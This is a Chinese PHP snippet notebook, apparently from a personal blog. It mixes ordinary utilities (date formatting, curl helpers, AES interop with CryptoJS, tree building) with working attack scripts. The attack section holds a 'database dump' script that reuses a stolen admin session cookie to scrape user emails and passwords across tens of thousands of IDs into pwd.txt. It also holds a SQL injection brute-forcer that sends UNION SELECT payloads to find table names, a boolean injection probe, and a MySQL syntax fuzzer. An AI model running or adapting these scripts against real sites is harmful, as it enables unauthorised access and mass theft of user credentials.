php mark

#php 日期转换成TZ格式

$time_tz_str = str_replace('+00:00', 'Z', gmdate('c', time()));
#2020-07-21T12:11:11Z

#trim 移除字符串

function strim($string,$removestring){
    if (!is_string($string) || !is_string($removestring)){
        return $string;
    }
    $result = preg_replace("/^{$removestring}|{$removestring}$/", "", $string);
    return $result;
}

#这样改strim会更好一点
function strim($string,$removestring=''){
    if (!is_string($string)){
        return $string;
    }
    if (!$removestring){
        return trim($string);
    }
    $result = preg_replace("/^{$removestring}|{$removestring}$/", "", $string);
    return $result;
}

#curl request

function curl_request($url,$post='',$cookie='', $returnCookie=0){
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)');
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($curl, CURLOPT_AUTOREFERER, 1);
    curl_setopt($curl, CURLOPT_REFERER, "http://XXX");
    if($post) {
        curl_setopt($curl, CURLOPT_POST, 1);
        //curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post));
        curl_setopt($curl, CURLOPT_POSTFIELDS, $post);
    }
    if($cookie) {
        curl_setopt($curl, CURLOPT_COOKIE, $cookie);
    }
    curl_setopt($curl, CURLOPT_HEADER, $returnCookie);
    curl_setopt($curl, CURLOPT_TIMEOUT, 10);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 1);  //ssl 这两行代码是为了能走https的请求,http请求放着也没有影响
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); //ssl 这两行代码是为了能走https的请求,http请求放着也没有影响
    $data = curl_exec($curl);
    if (curl_errno($curl)) {
        return curl_error($curl);
    }
    curl_close($curl);
    if($returnCookie){
        list($header, $body) = explode("\r\n\r\n", $data, 2);
        preg_match_all("/Set\-Cookie:([^;]*);/", $header, $matches);
        $info['cookie']  = substr($matches[1][0], 1);
        $info['content'] = $body;
        return $info;
    }else{
        return $data;
    }
}

#php remove bom str

function str_remove_bom($str){
  $charset[1] = substr($str, 0, 1);
  $charset[2] = substr($str, 1, 1);
  $charset[3] = substr($str, 2, 1);
  if (ord($charset[1]) == 239 && ord($charset[2]) == 187 && ord($charset[3]) == 191) {
      $rest = substr($str, 3);
      return $rest;
  } else{
  	return $str;
  }
}

#php实现内存地址反转

function array_endtostart($hex){
	$a_tmp=str_split($hex,2);
	$result=array_reverse($a_tmp);
	$hexstr=join("",$result);
	return $hexstr;
}

#php 实现汇编中的pxor

function xortnew($a,$b){
	$a_tmp=str_split($a,2);
	$b_tmp=str_split($b,2);
	$result="";
	foreach($a_tmp as $key=>$value){
			$a_b=hex2bin($value);
			$b_b=hex2bin($b_tmp[$key]);
			$r = $a_b ^ $b_b;
			$result .=bin2hex($r);
	}
	
	return $result;
}
var_dump(xortnew("3e213b21343d3c3e00000002253a600c","0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c"));

#php 查找字符串与替换

function tapreplace($str){
    $newstr=preg_replace_callback("/(<pre.*<\/pre>)/s",function ($match){
        $text=preg_replace("/\t/","&nbsp;&nbsp;&nbsp;&nbsp;",$match[0]);
        $text=preg_replace("/&#39;/","'",$text);
        $text=preg_replace("/#/","#",$text);
        $text=preg_replace("/\"/",""",$text);
        $text=preg_replace("/'/","'",$text);
        return $text;
    },$str);
    return $newstr;
}

#dokuwiki在php7下报operator not supported for strings in 错

inc\lessc.inc.php

	public $importDir = '';
#改为
	public $importDir = array();

#CryptoJS 与php互通

#CryptoJS 中
#128位AES加密
var key = CryptoJS.lib.WordArray.random(16);
var iv =  CryptoJS.lib.WordArray.random(16);
var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv});
#php:
        $key_str = hex2bin('xxxxxxx');
        $iv_str = hex2bin('xxxxxxx');
        $str="xxxxx";
        $result =openssl_decrypt($str,'aes-128-cbc',$key_str,false,$iv_str);

#192 aes
var key = CryptoJS.lib.WordArray.random(24);
var iv =  CryptoJS.lib.WordArray.random(16);
var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv});
#php:
        $key_str = hex2bin('xxxxxxx');
        $iv_str = hex2bin('xxxxxxx');
        $str="xxxxx";
        $result =openssl_decrypt($str,'aes-192-cbc',$key_str,false,$iv_str);


#256 aes:

var key = CryptoJS.lib.WordArray.random(32);
var iv =  CryptoJS.lib.WordArray.random(16);
var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv});
#php:
        $key_str = hex2bin('xxxxxxx');
        $iv_str = hex2bin('xxxxxxx');
        $str="xxxxx";
        $result =openssl_decrypt($str,'aes-256-cbc',$key_str,false,$iv_str);

#php try catch warning

set_error_handler(function($errno, $errstr, $errfile, $errline, array $errcontext) {
    // error was suppressed with the @-operator
    if (0 === error_reporting()) {
        return false;
    }

    throw new ErrorException($errstr, 0, $errno, $errfile, $errline);
});


#然后直接try就可以了
        try{
            if (preg_match("/{$rule}/", $result['url'])) {
                $end['match']=1;
                $end['code_error']=0;
            }
            if ($result['code'] == 404) {
                $end['code_error']=1;
            }
        }catch (Exception $e){
            var_dump($rule);
        }

#数组对象转换

/**
 * 数组 转 对象
 *
 * @param array $arr 数组
 * @return object
 */
function array_to_object($arr)
{
    if (gettype($arr) != 'array')
    {
        return;
    }
    foreach ($arr as $k => $v)
    {
        if (gettype($v) == 'array' || gettype($v) == 'object')
        {
            $arr[$k] = (object)array_to_object($v);
        }
    }
 
    return (object)$arr;
}
 
/**
 * 对象 转 数组
 *
 * @param object $obj 对象
 * @return array
 */
function object_to_array($obj)
{
    $obj = (array)$obj;
    foreach ($obj as $k => $v)
    {
        if (gettype($v) == 'resource')
        {
            return;
        }
        if (gettype($v) == 'object' || gettype($v) == 'array')
        {
            $obj[$k] = (array)object_to_array($v);
        }
    }
 
    return $obj;
}

#一个无极限分类

function get_tree($result){
        $tree = array();
        foreach($result as $item){
            if(isset($result[$item['pid']])){
                $result[$item['pid']]['son'][] = &$result[$item['pro_id']];
            }else{
                $tree[] = &$result[$item['pro_id']];
            }
        }
        return $tree;

}

//生成无极限的数据

//用递归展示处理的数据
    function getviewdata($data,$level=0){
            foreach($data as $key=>$value){
                for($i=0;$i<=$level;$i++){
                    echo '&emsp;&emsp;';
                }
                echo $value['pro_name'];
                echo '<br>';
                if(!empty($value['son'])){
                    getviewdata($value['son'],$level+1);
                }
            }
    }
    getviewdata($xx);




#某脱库脚本

function getuidinfo($i){
sleep(0.5);
$url="http://www.xxx.cn/admin.php?s=/product/order/index/uid/{$i}";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/xxx (KHTML, like Gecko) Chrome/xxx Safari/xxx');
curl_setopt($ch, CURLOPT_REFERER,'http://www.xxx.cn/admin.php?s=/product/order/index/uid/24');
curl_setopt($ch, CURLOPT_COOKIE,'PHPSESSID=vhbnfht14o07cvrhnuq5ir6o77');
$output = curl_exec($ch);
curl_close($ch);
preg_match_all('/<tbody>.*<\/tbody>/ims',$output,$result);
if(!isset($result[0][0]) || !$result[0][0]){
return array();
}
$tmp_array= explode("\n",$result[0][0]);
if(!$tmp_array){
return array();
}

$result_out=array();
foreach ($tmp_array as $a_tmp){
$a_tmp = trim($a_tmp);
if(!preg_match('/^<td>\d+<\/td>/',$a_tmp)){
continue;
}

preg_match('#^<td>\d+</td><td>.*</td><td>(.*)</td><td>\d+\.\d+</td><td>[^<]*</td><td>[^<]*</td><td><a[^>]*>([^<]*)</a></td>#',$a_tmp,$a_result);
$result_out[]=$a_result[1];
$account_name = $a_result['2'];
}
if (!isset($account_name)){
return array();
}
$result_out=array_unique($result_out);

$return['email']=$account_name;
$return['pid']=$result_out;

return $return;
}


function getproduct($product_id){
sleep(0.5);
$url="http://www.xxx.cn/admin.php?s=/product/user/index&keyword={$product_id}";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/xxx (KHTML, like Gecko) Chrome/xxx Safari/xxx');
curl_setopt($ch, CURLOPT_REFERER,'http://www.xxx.cn/admin.php?s=/product/order/index/uid/24');
curl_setopt($ch, CURLOPT_COOKIE,'PHPSESSID=vhbnfht14o07cvrhnuq5ir6o77');
$output = curl_exec($ch);
curl_close($ch);
preg_match_all('/<tbody>.*<\/tbody>/ims',$output,$result);
if(!isset($result[0][0]) || !$result[0][0]){
return array();
}
$tmp_array= explode("\n",$result[0][0]);
if(!$tmp_array){
return array();
}
$result=array();
foreach ($tmp_array as $a_tmp){
$a_tmp = trim($a_tmp);
if(!preg_match('/^<td>\d+<\/td>/',$a_tmp)){
continue;
}

preg_match('#^<td>\d+</td><td><a[^>]*>[^<]*</a></td><td>[^<]*</td><td>([^<]*)</td>#',$a_tmp,$a_result);
$result=$a_result[1];
}
if(!$result){
return array();
}
return $result;

}

for($i=1;$i<32167;$i++){
$uidinfo = getuidinfo($i);
if(!$uidinfo){
continue;
}
echo $i."\n";
$strs = "uid:{$i} email:".$uidinfo['email'].":";
$pwd_tmp=array();
foreach($uidinfo['pid'] as $pid){
$pwd = getproduct($pid);
if(!$pwd){
continue;
}
$pwd_tmp[]=$pwd;
}
$pwd_tmp=array_unique($pwd_tmp);
$pwd_str =implode("|",$pwd_tmp);
$strs .=$pwd_str."\n";

file_put_contents("pwd.txt",$strs,8);
sleep(0.5);
}

#thinkphp路由模式

http://www.xxx.net/product/index/xxx/id/29192
=>
http://www.xxx.net/index.php?m=product&c=index&a=xxx&id=29192

#跑表名

set_time_limit(0);
$tables = file("tables");

foreach ($tables as $a_tables){
$a_tables = trim($a_tables);
$url = "http://www.xxx.net/product/index/xxx/id/29192) and 1=1 and 1=2 union select 29192,29192,29192,2,2,4,5,(select id from ss_{$a_tables} where id>1 limit 0,1 ),7,8,9,10,2 -- a";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch,CURLOPT_COOKIE,'PHPSESSID=ddk0k3c1q3a9nio7rl4fkihtf4');
$output = curl_exec($ch);
curl_close($ch);

$garbage = strstr($output, "exist");
if($garbage == false) 
{
echo $a_tables."<br>";
} 
sleep(2);

}

#inject

$i = $_GET['id'];
sleep(1);
$url = "http://xxx.xxx.net/xxx/index/xxx/id/29192) and 1={$i} --";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_COOKIE,'PHPSESSID=ddk0k3c1q3a9nio7rl4fkihtf4');
$output = curl_exec($ch);
curl_close($ch);
print_r($output);

#fuzz1

<?php
$con=mysqli_connect("localhost","root","123456","test"); 
if (mysqli_connect_errno($con)) 
{ 
   echo 111;
	exit;
} 


for($i=0;$i<255;$i++) {

	for($j=0;$j<255;$j++) {

$char_str = chr($i);
$charj_str = chr($j);
$strs = "select count(*) from `information_schema`{$char_str}{$charj_str}`SCHEMATA`";
$result=mysqli_query($con,$strs);
$posts = array();
while($row = @mysqli_fetch_array($result)) {
    $posts[] = $row;
} 
if(isset($posts[0]) && $posts[0][0]==10 ){
echo "<font color=red>aaaa</font>{$i}|{$j}<br>";
}


	}

}  


mysqli_close($con);

#毫秒

list($usec, $sec) = explode(" ", microtime());
$lusec = sprintf('%03d',$usec*1000);

发表评论

邮箱地址不会被公开。 必填项已用*标注